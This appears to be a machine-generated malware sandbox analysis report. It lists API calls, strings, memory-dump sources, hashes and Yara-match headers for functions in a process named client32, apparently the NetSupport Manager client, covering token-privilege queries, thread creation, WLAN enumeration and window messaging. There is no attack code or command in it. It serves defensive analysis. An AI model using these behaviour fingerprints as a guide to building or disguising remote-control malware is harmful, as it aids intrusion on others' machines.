                                                                                                                                                                                                    • Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90
                                                                                                                                                                                                    Function 1104B12F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • PostMessageA.USER32(0000FFFF,0000C1E7,00000000,00000000), ref: 1104B225
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000483,00000000,00000000), ref: 1104B268
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000483,00000001,?), ref: 1104B293
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePost$__wcstoi64
                                                                                                                                                                                                    • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                                                                                                    • API String ID: 1802880851-2026197083
                                                                                                                                                                                                    • Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                                                                                    • Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4
                                                                                                                                                                                                    Function 11027310 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 11027336
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
                                                                                                                                                                                                    • LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
                                                                                                                                                                                                    • _free.LIBCMT ref: 110273C4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110273D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege_free
                                                                                                                                                                                                    • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
                                                                                                                                                                                                    • API String ID: 2058255784-3275751932
                                                                                                                                                                                                    • Opcode ID: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
                                                                                                                                                                                                    • Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1
                                                                                                                                                                                                    Function 6882AA54 Relevance: 15.1, APIs: 10, Instructions: 80librarythreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 6882AA6B
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(687D0000,?,00000104), ref: 6882AA87
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6882AA98
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6882AAAF
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6882AACA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 6882AADB
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,-00000018,68820EC3,00010000,68820EB1,?), ref: 6882AB1D
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6882AB27
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6882AB3F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 6882AB4D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 475412-0
                                                                                                                                                                                                    • Opcode ID: c8f0fa7b4d689891c6b7367278d2cec09e5e5ad50f069a1e8a97480d7b1f81ff
                                                                                                                                                                                                    • Instruction ID: c50221664dd21c7308b983b24c4b64297e29fbaa0e5c7e69e068bd7fb770ce36
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8f0fa7b4d689891c6b7367278d2cec09e5e5ad50f069a1e8a97480d7b1f81ff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2421F171A40209ABDF04EFA4CD59BAE77B8BF05340F804879E526E6140DB34DA44CBA0
                                                                                                                                                                                                    Function 110570C0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 228COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11057136
                                                                                                                                                                                                      • Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11057293
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
                                                                                                                                                                                                    • String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
                                                                                                                                                                                                    • API String ID: 1442689885-2337161965
                                                                                                                                                                                                    • Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                                                                                                    • Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1
                                                                                                                                                                                                    Function 110CF280 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110CF2A0
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 110CF327
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 110CF34B
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 110CF385
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 110CF3A1
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 110CF3EB
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110CF400
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                                                                    • Opcode ID: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
                                                                                                                                                                                                    • Instruction ID: 3f2339a9076695d70661dcab859014021b6c0d6f22495f28215c516d49704129
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541E876E00115ABDB04CE68CC81BAEF7F6EF80614F19C6A9DC15D7344EA34EA418B91
                                                                                                                                                                                                    Function 11125040 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11125060
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 111250EA
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1112510E
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 11125148
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 11125164
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 111251AE
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 111251C3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                                                                    • Opcode ID: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
                                                                                                                                                                                                    • Instruction ID: 0f323eff97a08ef0bfb1d310de9271f6685152ce05bf58ee348bace92ff13d14
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0541E776E00115ABDB54CE68CCC1AEEF7E5EF84214F69C668D81AD7344EA34EA41CBD0
                                                                                                                                                                                                    Function 1103B530 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110B5F0: timeGetTime.WINMM ref: 1110B5FD
                                                                                                                                                                                                      • Part of subcall function 110F6220: _memset.LIBCMT ref: 110F6245
                                                                                                                                                                                                      • Part of subcall function 110F6220: GetACP.KERNEL32(0072B858,DBCS,Charset,932=*128), ref: 110F62AE
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,?), ref: 1103B642
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1103B64A
                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B657
                                                                                                                                                                                                    • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B663
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 1103B66C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pixel$ReleaseSleepTime_memsettime
                                                                                                                                                                                                    • String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
                                                                                                                                                                                                    • API String ID: 686385934-1413253680
                                                                                                                                                                                                    • Opcode ID: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
                                                                                                                                                                                                    • Instruction ID: f16d89a374e4fe568ab7d55a1f425cdb876f14b981240f7c8f6700600d478685
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31419535E0161E9FEF15CFA4CD95BFEB7A5EB84309F10416DE916A7280EB34A90087A1
                                                                                                                                                                                                    Function 110051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 110051CE
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110051F0
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 11005204
                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
                                                                                                                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
                                                                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
